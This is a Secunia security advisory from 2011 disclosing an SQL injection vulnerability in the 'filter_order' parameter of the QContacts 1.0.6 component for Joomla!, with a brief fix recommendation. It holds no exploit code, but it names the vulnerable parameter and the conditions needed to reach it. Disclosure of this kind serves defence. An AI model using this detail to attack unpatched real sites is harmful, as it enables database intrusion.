Joomla! QContacts Component "filter_order" SQL Injection Vulnerability

SECUNIA ADVISORY ID:
SA47238

VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/47238/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=47238

RELEASE DATE:
2011-12-14
DESCRIPTION:
A vulnerability has been discovered in the QContacts component for
Joomla!, which can be exploited by malicious people to conduct SQL
injection attacks.

Input passed via the "filter_order" parameter to index.php (when
"option" is set to "com_qcontacts" and "filter_order_Dir" is set) is
not properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.

The vulnerability is confirmed in version 1.0.6. Other versions may
also be affected.

SOLUTION:
Edit the source code to ensure that input is properly sanitised.

PROVIDED AND/OR DISCOVERED BY:
Don